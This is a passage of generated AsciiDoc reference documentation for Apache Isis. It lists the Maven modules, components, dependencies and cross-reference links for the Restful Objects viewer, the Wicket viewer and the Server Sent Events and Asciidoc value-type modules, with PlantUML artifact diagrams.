xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectCollectionRepresentation.adoc[ObjectCollectionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectPropertyRepresentation.adoc[ObjectPropertyRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ScalarValueRepresentation.adoc[ScalarValueRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/AbstractTypeMemberRepresentation.adoc[AbstractTypeMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/ActionDescriptionRepresentation.adoc[ActionDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/ActionParameterDescriptionRepresentation.adoc[ActionParameterDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/CollectionDescriptionRepresentation.adoc[CollectionDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/DomainTypeRepresentation.adoc[DomainTypeRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/DomainTypeResource.adoc[DomainTypeResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/PropertyDescriptionRepresentation.adoc[PropertyDescriptionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/TypeActionResultRepresentation.adoc[TypeActionResultRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domaintypes\/TypeListRepresentation.adoc[TypeListRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/dtos\/ScalarValueDtoV2.adoc[ScalarValueDtoV2], xref:refguide:viewer:index\/restfulobjects\/applib\/errors\/ErrorRepresentation.adoc[ErrorRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/health\/HealthRepresentation.adoc[HealthRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/health\/HealthResource.adoc[HealthResource], xref:refguide:viewer:index\/restfulobjects\/applib\/homepage\/HomePageRepresentation.adoc[HomePageRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/homepage\/HomePageResource.adoc[HomePageResource], xref:refguide:viewer:index\/restfulobjects\/applib\/menubars\/MenuBarsResource.adoc[MenuBarsResource], xref:refguide:viewer:index\/restfulobjects\/applib\/user\/UserRepresentation.adoc[UserRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/user\/UserResource.adoc[UserResource], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/JsonMapper.adoc[JsonMapper], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/JsonNodeUtils.adoc[JsonNodeUtils], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/MediaTypes.adoc[MediaTypes], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/Parser.adoc[Parser], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/PathNode.adoc[PathNode], xref:refguide:viewer:index\/restfulobjects\/applib\/util\/UrlEncodingUtils.adoc[UrlEncodingUtils], xref:refguide:viewer:index\/restfulobjects\/applib\/version\/VersionRepresentation.adoc[VersionRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/version\/VersionResource.adoc[VersionResource]\n****\n\n|Apache Isis Viewer - RO (JAX-RS Resteasy v4)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-jaxrsresteasy4\nType: jar\nDirectory: \/viewers\/restfulobjects\/jaxrs-resteasy-4\n----\n|JAX-RS plugin using jboss resteasy.\n\n.Components\n****\no.a.i.viewer.restfulobjects.jaxrsresteasy4.conneg.RestfulObjectsJaxbWriterForXml +\no.a.i.viewer.restfulobjects.jaxrsresteasy4.webmodule.WebModuleJaxrsResteasy4 +\n****\n\n.Dependencies\n****\norg.apache.isis.viewer:isis-viewer-restfulobjects-rendering:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-testing:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.jboss.resteasy:resteasy-jaxb-provider:jar:<managed> +\norg.jboss.resteasy:resteasy-spring-boot-starter:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/IsisModuleViewerRestfulObjectsJaxrsResteasy4.adoc[IsisModuleViewerRestfulObjectsJaxrsResteasy4], xref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/conneg\/RestfulObjectsJaxbWriterForXml.adoc[RestfulObjectsJaxbWriterForXml], xref:refguide:viewer:index\/restfulobjects\/jaxrsresteasy4\/webmodule\/WebModuleJaxrsResteasy4.adoc[WebModuleJaxrsResteasy4]\n****\n\n|Apache Isis Viewer - RO (Rendering)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-rendering\nType: jar\nDirectory: \/viewers\/restfulobjects\/rendering\n----\n|.Components\n****\no.a.i.viewer.restfulobjects.rendering.domainobjects.JsonValueEncoder +\no.a.i.viewer.restfulobjects.rendering.service.RepresentationService +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest$RequestFilter +\no.a.i.viewer.restfulobjects.rendering.service.acceptheader.AcceptHeaderServiceForRest$ResponseFilter +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceForRestfulObjectsV1_0 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceOrgApacheIsisV1 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceOrgApacheIsisV2 +\no.a.i.viewer.restfulobjects.rendering.service.conneg.ContentNegotiationServiceXRoDomainType +\no.a.i.viewer.restfulobjects.rendering.service.swagger.SwaggerServiceDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.ClassExcluderDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.SwaggerSpecGenerator +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.TaggerDefault +\no.a.i.viewer.restfulobjects.rendering.service.swagger.internal.ValuePropertyFactoryDefault +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/rendering\/IResourceContext.adoc[IResourceContext], xref:refguide:viewer:index\/restfulobjects\/rendering\/IsisModuleRestfulObjectsRendering.adoc[IsisModuleRestfulObjectsRendering], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/RepresentationService.adoc[RepresentationService], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/acceptheader\/AcceptHeaderServiceForRest.adoc[AcceptHeaderServiceForRest], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationService.adoc[ContentNegotiationService], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceAbstract.adoc[ContentNegotiationServiceAbstract], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceForRestfulObjectsV1_0.adoc[ContentNegotiationServiceForRestfulObjectsV1_0], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceOrgApacheIsisV1.adoc[ContentNegotiationServiceOrgApacheIsisV1], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceOrgApacheIsisV2.adoc[ContentNegotiationServiceOrgApacheIsisV2], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/conneg\/ContentNegotiationServiceXRoDomainType.adoc[ContentNegotiationServiceXRoDomainType], xref:refguide:viewer:index\/restfulobjects\/rendering\/service\/swagger\/SwaggerServiceMenu.adoc[SwaggerServiceMenu]\n****\n\n|Apache Isis Viewer - RO (Testing)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-testing\nType: jar\nDirectory: \/viewers\/restfulobjects\/testing\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-viewer:jar:<managed> +\n****\n\n|Apache Isis Viewer - RO (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-viewer\nType: jar\nDirectory: \/viewers\/restfulobjects\/viewer\n----\n|.Components\n****\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForObjectNotFound +\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForRestfulObjectsApplication +\no.a.i.viewer.restfulobjects.viewer.mappers.ExceptionMapperForRuntimeException +\no.a.i.viewer.restfulobjects.viewer.resources.DomainObjectResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.DomainServiceResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.DomainTypeResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.HomePageResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.ImageResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.MenuBarsResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.SwaggerSpecResource +\no.a.i.viewer.restfulobjects.viewer.resources.UserResourceServerside +\no.a.i.viewer.restfulobjects.viewer.resources.VersionResourceServerside +\n****\n\n.Dependencies\n****\ncom.fasterxml.jackson.module:jackson-module-jaxb-annotations:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-restfulobjects-rendering:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/viewer\/IsisModuleViewerRestfulObjectsViewer.adoc[IsisModuleViewerRestfulObjectsViewer]\n****\n|===\n\n=== Wicket\n\n[plantuml,Wicket,svg]\n----\n@startuml(id=Wicket)\ntitle Wicket - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Wicket\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - Wicket\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Viewer - Wicket (Model)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Viewer - Wicket (UI Components)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Viewer - Wicket (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n@enduml\n----\n.Projects\/Modules (Wicket)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - Wicket\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket\nType: pom\nDirectory: \/viewers\/wicket\n----\n|\n\n|Apache Isis Viewer - Wicket (Model)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-model\nType: jar\nDirectory: \/viewers\/wicket\/model\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-common:jar:<managed> +\norg.apache.wicket:wicket-core:jar:<managed> +\norg.apache.wicket:wicket-extensions:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/model\/IsisModuleViewerWicketModel.adoc[IsisModuleViewerWicketModel]\n****\n\n|Apache Isis Viewer - Wicket (UI Components)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-ui\nType: jar\nDirectory: \/viewers\/wicket\/ui\n----\n|.Components\n****\no.a.i.viewer.wicket.ui.app.logout.LogoutHandlerWkt +\no.a.i.viewer.wicket.ui.components.widgets.themepicker.IsisWicketThemeSupportDefault +\n****\n\n.Dependencies\n****\ncom.google.guava:guava:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-extensions:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-themes:jar:<managed> +\nde.agilecoders.wicket.webjars:wicket-webjars:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-model:jar:<managed> +\norg.apache.wicket:wicket-auth-roles:jar:<managed> +\norg.apache.wicket:wicket-core:jar:<managed> +\norg.apache.wicket:wicket-devutils:jar:<managed> +\norg.apache.wicket:wicket-extensions:jar:<managed> +\norg.apache.wicket:wicket-spring:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\norg.slf4j:slf4j-api:jar:${slf4j-api.version} +\norg.webjars:jquery-ui:jar:<managed> +\norg.webjars:select2:jar:<managed> +\norg.webjars.bower:summernote:jar:<managed> +\norg.wicketstuff:wicketstuff-select2:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/ui\/IsisModuleViewerWicketUi.adoc[IsisModuleViewerWicketUi]\n****\n\n|Apache Isis Viewer - Wicket (Viewer)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-wicket-viewer\nType: jar\nDirectory: \/viewers\/wicket\/viewer\n----\n|.Components\n****\no.a.i.viewer.wicket.viewer.registries.components.ComponentFactoryRegistrarDefault +\no.a.i.viewer.wicket.viewer.registries.components.ComponentFactoryRegistryDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageClassListDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageClassRegistryDefault +\no.a.i.viewer.wicket.viewer.registries.pages.PageNavigationServiceDefault +\no.a.i.viewer.wicket.viewer.services.BookmarkUiServiceWicket +\no.a.i.viewer.wicket.viewer.services.DeepLinkServiceWicket +\no.a.i.viewer.wicket.viewer.services.HintStoreUsingWicketSession +\no.a.i.viewer.wicket.viewer.services.ImageResourceCacheClassPath +\no.a.i.viewer.wicket.viewer.services.LocaleProviderWicket +\no.a.i.viewer.wicket.viewer.services.TranslationsResolverWicket +\no.a.i.viewer.wicket.viewer.services.WicketViewerSettingsDefault +\no.a.i.viewer.wicket.viewer.services.mementos.ObjectMementoServiceWicket +\no.a.i.viewer.wicket.viewer.webmodule.WebModuleWicket +\n****\n\n.Dependencies\n****\ncommons-io:commons-io:jar:<managed> +\nde.agilecoders.wicket:wicket-bootstrap-core:jar:<managed> +\nnet.ftlines.wicket-source:wicket-source:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\norg.apache.wicket:wicket-auth-roles:jar:<managed> +\norg.apache.wicket:wicket-spring:jar:<managed> +\norg.jmock:jmock-junit4:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/wicket\/viewer\/IsisModuleViewerWicketViewer.adoc[IsisModuleViewerWicketViewer], xref:refguide:viewer:index\/wicket\/viewer\/mixins\/Object_clearHints.adoc[Object_clearHints]\n****\n|===\n\n== Valuetypes\n\n[plantuml,Valuetypes,svg]\n----\n@startuml(id=Valuetypes)\ntitle Valuetypes - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Valuetypes\\n[Software System]\" {\n rectangle \"==Apache Isis Val - SSE (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Server Sent Events\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Server Sent Events (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Server Sent Events (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Server Sent Events (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Value types\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n}\n6 .[#707070].> 7 : \"\"\n3 .[#707070].> 6 : \"\"\n3 .[#707070].> 4 : \"\"\n3 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n@enduml\n----\n.Projects\/Modules (Valuetypes)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Value types\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes\nType: pom\nDirectory: \/valuetypes\n----\n|Value types for use within Apache Isis applications.\n\n.Dependencies\n****\norg.projectlombok:lombok:jar:<managed> +\n****\n\n|Apache Isis Val - Server Sent Events (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse\nType: pom\nDirectory: \/valuetypes\/sse\n----\n|Dynamically updating HTML markup\n\n|Apache Isis Val - Server Sent Events\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-applib\nType: jar\nDirectory: \/valuetypes\/sse\/applib\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/sse\/applib\/IsisModuleValSseApplib.adoc[IsisModuleValSseApplib], xref:refguide:valuetypes:index\/sse\/applib\/annotations\/ServerSentEvents.adoc[ServerSentEvents], xref:refguide:valuetypes:index\/sse\/applib\/annotations\/SseSource.adoc[SseSource], xref:refguide:valuetypes:index\/sse\/applib\/service\/SseChannel.adoc[SseChannel], xref:refguide:valuetypes:index\/sse\/applib\/service\/SseService.adoc[SseService]\n****\n\n|Apache Isis Val - Server Sent Events (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-metamodel\nType: jar\nDirectory: \/valuetypes\/sse\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.sse.metamodel.facets.SseAnnotationFacetFactory$Register +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\n****\n\n|Apache Isis Val - SSE (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-ui\nType: pom\nDirectory: \/valuetypes\/sse\/ui\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-sse-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Server Sent Events (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-sse-ui-wkt\nType: jar\nDirectory: \/valuetypes\/sse\/ui\/wicket\n----\n|.Components\n****\no.a.i.valuetypes.sse.ui.wkt.markup.ListeningMarkupPanelFactoriesForWicket$Parented +\no.a.i.valuetypes.sse.ui.wkt.markup.ListeningMarkupPanelFactoriesForWicket$Standalone +\no.a.i.valuetypes.sse.ui.wkt.services.SseServiceDefault +\no.a.i.valuetypes.sse.ui.wkt.webmodule.WebModuleServerSentEvents +\n****\n\n.Dependencies\n****\norg.apache.isis.valuetypes:isis-valuetypes-sse-metamodel:jar:<managed> +\norg.apache.isis.viewer:isis-viewer-wicket-ui:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/sse\/ui\/wkt\/IsisModuleValSseUiWkt.adoc[IsisModuleValSseUiWkt], xref:refguide:valuetypes:index\/sse\/ui\/wkt\/services\/SseServiceDefault.adoc[SseServiceDefault], xref:refguide:valuetypes:index\/sse\/ui\/wkt\/webmodule\/WebModuleServerSentEvents.adoc[WebModuleServerSentEvents]\n****\n|===\n\n=== Asciidoc\n\n[plantuml,Asciidoc,svg]\n----\n@startuml(id=Asciidoc)\ntitle Asciidoc - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<9>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Asciidoc\\n[Software System]\" {\n rectangle \"==Apache Isis Val - Asciidoctor (MetaModel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Val - Asciidoctor (Persistence)\\n<size:10>[Container: packaging: pom]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Val - Asciidoctor (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Val - Asciidoctor (parent)\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Val - Asciidoctor (persistence jdo DN5)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Val - Asciidoctor (ui vaadin)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Val - Asciidoctor (ui wicket)\\n<size:10>[Container: packaging: jar]<\/size>\" <<9>> as 9\n rectangle \"==Apache Isis Val - Asciidoctor (ui)\\n<size:10>[Container: packaging: pom]<\/size>\" <<7>> as 7\n}\n5 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 7 : \"\"\n7 .[#707070].> 9 : \"\"\n@enduml\n----\n.Projects\/Modules (Asciidoc)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Val - Asciidoctor (parent)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc\nType: pom\nDirectory: \/valuetypes\/asciidoc\n----\n|Asciidoc value type.\n\n|Apache Isis Val - Asciidoctor (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-applib\nType: jar\nDirectory: \/valuetypes\/asciidoc\/applib\n----\n|.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.asciidoctor:asciidoctorj-api:jar:${asciidoctorj.version} +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/applib\/IsisModuleValAsciidocApplib.adoc[IsisModuleValAsciidocApplib], xref:refguide:valuetypes:index\/asciidoc\/applib\/jaxb\/AsciiDocJaxbAdapter.adoc[AsciiDocJaxbAdapter], xref:refguide:valuetypes:index\/asciidoc\/applib\/value\/AsciiDoc.adoc[AsciiDoc]\n****\n\n|Apache Isis Val - Asciidoctor (MetaModel)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-metamodel\nType: jar\nDirectory: \/valuetypes\/asciidoc\/metamodel\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.metamodel.AsciiDocMetaModelRefiner +\no.a.i.valuetypes.asciidoc.metamodel.AsciiDocValueTypeProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/metamodel\/IsisModuleValAsciidocMetaModel.adoc[IsisModuleValAsciidocMetaModel]\n****\n\n|Apache Isis Val - Asciidoctor (Persistence)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-persistence\nType: pom\nDirectory: \/valuetypes\/asciidoc\/persistence\n----\n|.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\n****\n\n|Apache Isis Val - Asciidoctor (persistence jdo DN5)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-persistence-jdo-dn5\nType: jar\nDirectory: \/valuetypes\/asciidoc\/persistence\/jdo-dn5\n----\n|.Dependencies\n****\norg.datanucleus:datanucleus-core:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:valuetypes:index\/asciidoc\/persistence\/jdo\/dn5\/IsisModuleValAsciidocPersistenceJdoDn5.adoc[IsisModuleValAsciidocPersistenceJdoDn5], xref:refguide:valuetypes:index\/asciidoc\/persistence\/jdo\/dn5\/converters\/IsisAsciiDocConverter.adoc[IsisAsciiDocConverter]\n****\n\n|Apache Isis Val - Asciidoctor (ui)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui\nType: pom\nDirectory: \/valuetypes\/asciidoc\/ui\n----\n|.Dependencies\n****\ncom.github.jnr:jnr-constants:jar:0.10.1 +\ncom.github.jnr:jnr-enxio:jar:0.32.4 +\ncom.github.jnr:jnr-posix:jar:3.1.5 +\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.valuetypes:isis-valuetypes-asciidoc-applib:jar:<managed> +\norg.asciidoctor:asciidoctorj:jar:${asciidoctorj.version} +\n****\n\n|Apache Isis Val - Asciidoctor (ui vaadin)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui-vaa\nType: jar\nDirectory: \/valuetypes\/asciidoc\/ui\/vaadin\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.ui.vaa.components.AsciiDocFieldFactoryVaa +\n****\n\n.Dependencies\n****\norg.apache.isis.incubator.viewer:isis-viewer-vaadin-ui:jar:${project.version} +\n****\n\n|Apache Isis Val - Asciidoctor (ui wicket)\n[source,yaml]\n----\nGroup: org.apache.isis.valuetypes\nArtifact: isis-valuetypes-asciidoc-ui-wkt\nType: jar\nDirectory: \/valuetypes\/asciidoc\/ui\/wicket\n----\n|.Components\n****\no.a.i.valuetypes.asciidoc.ui.wkt.components.AsciiDocPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.AsciiDocPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.chg.v2.ChangesDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.chg.v2.ChangesDtoPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.cmd.v2.CommandDtoPanelFactoriesWkt$Parented +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.cmd.v2.CommandDtoPanelFactoriesWkt$Standalone +\no.a.i.valuetypes.asciidoc.ui.wkt.components.schema.ixn.v2.InteractionDtoPanelFactoriesWkt$Parented 